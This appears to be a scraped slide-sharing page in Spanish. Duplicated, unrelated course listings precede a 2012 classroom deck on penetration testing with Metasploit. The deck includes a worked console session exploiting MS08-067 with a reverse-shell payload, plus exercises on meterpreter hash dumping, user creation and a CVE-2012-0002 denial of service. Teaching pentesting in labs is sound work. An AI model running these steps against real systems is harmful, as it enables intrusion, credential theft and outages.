Este documento describe cómo realizar pruebas de intrusión mediante la explotación de vulnerabilidades. Explica los conceptos de exploits y payloads, y cómo herramientas como Metasploit Framework y CVEdetails pueden usarse para buscar exploits existentes y explotar vulnerabilidades mediante el lanzamiento de exploits configurados contra sistemas objetivo. Además, proporciona ejemplos prácticos de cómo usar Metasploit para obtener acceso remoto a una máquina Windows mediante una vulnerabilidad de SMB y las capacidades que ofrece el payload meterpreter.
Actividad No. 6.3: Escaneo de vulnerabilidades con NessusFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Materia: Seguridad en Redes
Tema: Detección de vulnerabilidades e intrusiones
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
Metasploit Framework es una infraestructura la cual puede ser construida y utilizada para necesidades específicas. Incluye una amplia diversidad de exploits de nivel comercial y un amplio entorno para el desarrollo de exploits. Todo esto permite concentrarse en los aspectos especializados al realizar Pruebas de Penetración, para identificar y explotar fallas durante este procedimiento.
Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...Francisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali LinuxFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 6.3: Escaneo de vulnerabilidades con NessusFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Materia: Seguridad en Redes
Tema: Detección de vulnerabilidades e intrusiones
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
Metasploit Framework es una infraestructura la cual puede ser construida y utilizada para necesidades específicas. Incluye una amplia diversidad de exploits de nivel comercial y un amplio entorno para el desarrollo de exploits. Todo esto permite concentrarse en los aspectos especializados al realizar Pruebas de Penetración, para identificar y explotar fallas durante este procedimiento.
Actividad Final: Instalación del LMS Moodle en CentOS con el módulo SELinux h...Francisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 1.10 Análisis de vulnerabilidades con VEGA en Kali LinuxFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Francisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño, Construcción y Administración de Redes de Datos
Módulo 6. Seguridad de Bases de Datos
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
Las técnicas antiforenses son cualquier cambio intencional o accidental las cuales pueden oscurecer, cifrar, u ocultar datos de la herramientas forenses. Muy pocas técnicas antiforenses funcionan de la forma en la cual se podría esperar, creyendo es factible ocultar huellas. El intentar hacer esto frecuentemente solo ayuda al investigador a conocer los lugares donde buscar y descubrir evidencia digital.
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Bases de Datos
Módulo 6. Seguridad de Bases de Datos
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
OpenVAS (Open Vulnerability Assessment System) o Sistema Abierto para la Evaluación de Vulnerabilidades) está constituido por varios servicios y herramientas los cuales proporcionan un completo y poderoso entorno para el escaneo de vulnerabilidades, además de una solución para la administración de vulnerabilidades. OpenVAS es Software Libre.
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Francisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Base de Datos
Módulo 6. Seguridad de Bases de Datos
Actividad No. 1.11: SQL Injection con sqlmap en Kali LinuxFrancisco Medina
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño, Construcción y Administración de Redes de Datos
Módulo 6. Seguridad de Bases de Datos
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
Las técnicas antiforenses son cualquier cambio intencional o accidental las cuales pueden oscurecer, cifrar, u ocultar datos de la herramientas forenses. Muy pocas técnicas antiforenses funcionan de la forma en la cual se podría esperar, creyendo es factible ocultar huellas. El intentar hacer esto frecuentemente solo ayuda al investigador a conocer los lugares donde buscar y descubrir evidencia digital.
Universidad Nacional Autónoma de México
Facultad de Contaduría y Administración
Diplomado Diseño y Administración de Bases de Datos
Módulo 6. Seguridad de Bases de Datos
Sitio Web: http://www.reydes.com
e-mail: caballero.alonso@gmail.com
OpenVAS (Open Vulnerability Assessment System) o Sistema Abierto para la Evaluación de Vulnerabilidades) está constituido por varios servicios y herramientas los cuales proporcionan un completo y poderoso entorno para el escaneo de vulnerabilidades, además de una solución para la administración de vulnerabilidades. OpenVAS es Software Libre.
Curso de Metasploit Framework creado para impartir formación en el Curso de Seguridad Avanzada de la Universitat Jaume I de Castellón (UJI) y para el módulo de PenTesting del Curso de Auditorías Informáticas de la Universitat Politécnica de Valencia (UPV).
Curso de Metasploit Framework creado para impartir formación en el Curso de Seguridad Avanzada de la Universitat Jaume I de Castellón (UJI) y para el módulo de PenTesting del Curso de Auditorías Informáticas de la Universitat Politécnica de Valencia (UPV).
Versión 0.5
Charla presentación de Sebastián Bortnik en el Workshop de Seguridad Informática en Sistemas Operativos desarrollado en la UTN Rosario el día 3 de noviembre de 2009. Más información: http://unmundobinario.com
Pensamiento computacional e inteligencia artificial en la educaciónJesús Moreno León
Presentación realizada en las Jornadas Iniciales Presenciales de Asesoramiento para PRODIG celebradas en Sevilla el 21 de noviembre de 2019. Se presentan ideas, recursos, resultados de investigaciones y normativa que respalda la introducción del pensamiento computacional y la inteligencia artificial en etapas educativas no universitarias.
Investigación sobre el desarrollo del pensamiento computacional en la escuelaJesús Moreno León
Resumen de las investigaciones principales desarrolladas por el grupo KGBL3 -formado por investigadores de la URJC, la UNED y Programamos- sobre el desarrollo del pensamiento computacional en la educación.
Can we Measure Computational Thinking with Tools? Present and Future of Dr. S...Jesús Moreno León
Slides for the presentation at the Seminar Series on Advanced Techniques & Tools for Software Evolution (SATToSE), which took place in Madrid (Spain) on 7–9 June 2017.
How social are Scratch learners? A comprehensive analysis of the Scratch plat...Jesús Moreno León
How social are Scratch learners? A comprehensive analysis of the Scratch platform for social interactions.
Paper presented at the 'FLOSS education and computational thinking workshop' - 12th International Conference on Open Source Systems. 2 June 2016, Gothenburg, Sweden
La programación informática como vía de emprendimiento. Programamos.Jesús Moreno León
La programación informática como vía de emprendimiento. Presentación en las Jornadas de Inserción Laboral del IES Polígono Sur de Sevilla. 17 de diciembre de 2015.
Dr. Scratch, Análisis de proyectos Scratch para medir el desarrollo del a Pen...Jesús Moreno León
Dr. Scratch, Anáisis de proyectos Scratch para medir el desarrollo del Pensamiento Computacional y mejorar las habilidades de programación.
Seminario eMadrid sobre Pensamiento Computacional.
Computer Programming as an Educational Tool in the English Classroom: a preli...
Sad tema2 pen_test_iii
1. Seguridad y Alta Disponibilidad:
Test de intrusión (III): explotación de vulnerabilidades
Jesús Moreno León
jesus.moreno.edu@
juntadeandalucía.es
Septiembre 2012
3. Exploits
Cuando se han encontrado los bugs, el objetivo es crear una
herramienta que saque partido de ellos, es decir, que sea capaz
de hacer uso de esa “funcionalidad no definida del programa”.
Para ello, se analizan las posibilidades y alcance de ese bug y se
opta por un determinado exploit, que es, precisamente, un
código escrito con el fin de aprovechar un bug para obtener
diversos privilegios.
Todos los exploits tienen dos partes diferenciadas:
●
La cabecera, que es lo que se denomina exploit puramente y
que depende de cada bug
●
El cuerpo, denominado payload que son acciones ya
programadas que se reutilizan entre los diferentes exploits
4. Búsqueda de exploits
El número de vulnerabilidades que se publican diariamente es
altísimo. Sin embargo, el número de exploits que se ponen
disponibles no iguala ni por asomo al de vulnerabilidades
Frameworks como Metasploit son una herramienta básica para
todo pentester, pero no contiene todos los exploits disponibles,
ya que, por ejemplo, muchos exploits sólo se incluyen en
frameworks comerciales, como Canvas de Immunity, ya que son
desarrollados con sus equipos de exploiters y no son públicos
Una buena base de datos es la de http://www.cvedetails.com
Fuente: Seguridad Apple
http://www.seguridadapple.com/2012/10/cve-
details-buscar-exploits-para.html
7. Explotando los bugs
Metasploit es una herramienta
que aúna una base de datos de
cabeceras de exploits y de
payloads.
Se usa por profesionales de la
seguridad informática para
realizar Pentests, administradores
de sistemas para verificar la
instalación de parches e
investigadores de todo el mundo
para realizar pruebas. http://www.metasploit.com/
8. Metasploit Express
La versión Express es de pago y no es más que un front-end
para el framework Metasploit que incorpora funcionalidades que
automatizan el proceso de un test de intrusión y permite generar
informes con los resultados. Pasos a seguir:
1. Crear un proyecto
2. Descubrir dispositivos
3, Conseguir acceso a los equipos
4. Tomar el control de una sesión
5. Recoger datos de las máquinas atacadas
6. Limpiar la sesión
7. Generar un informe
9. Metasploit Express
Veamos los pasos a seguir para conseguir una sesión en este
equipo, que es un Windows XP en el que un usuario está
navegando por Internet
19. Metasploit Framework
Este framework incluye
herramientas, bibliotecas, módulos
y una interfaz de usuario. La
funcionalidad básica es un lanzador
de módulos que permite al usuario
configurar un exploit y lanzarlo
contra un equipo objetivo. Si el
exploit tiene éxito, se ejecuta el
payload en el objetivo y se le facilita
al usuario una shell para interactuar
con el payload.
http://www.elladodelmal.com/2010/07/metasploit-con-adobe-flash-player-un.html
20. Metasploit Framework
¿Cómo se configuran y se lanzan los exploits con el framework?
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> set RHOST X.X.X.X
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi)> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST Y.Y.Y.Y
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 – lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Attempting to trigger the vulnerability...
Microsoft Windows XP [Versi?n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>
21. Metasploit Framework
●
Práctica 1: aprovechando la misma vulnerabilidad y usando
el mismo exploit, utiliza el payload meterpreter e investiga
todas las posibilidades que te ofrece una vez conseguida una
sesión en la máquina objetivo:
●
Subir ficheros
● Ejecutar programas
● Descargar ficheros
●
Activar el acceso remoto
●
Crear usuarios
● Copiar las hashes de las passwords
● ...
22. Metasploit Framework
●
Práctica 2: DOS a Windows 7, a través de una versión no
actualizada del escritorio remoto
CVE-2012-0002
1. Localizar exploit
2. Configurar exploit
3. Lanzar exploit
4. Pantallazo azul
23. Más información
●
Estas diapositivas están basadas en el curso
Pentesting con Metasploit Framework, impartido por Pablo
González de Informática 64.
●
http://www.flu-project.com
●
http://www.seguridadapple.com
●
www.elladodelmal.com/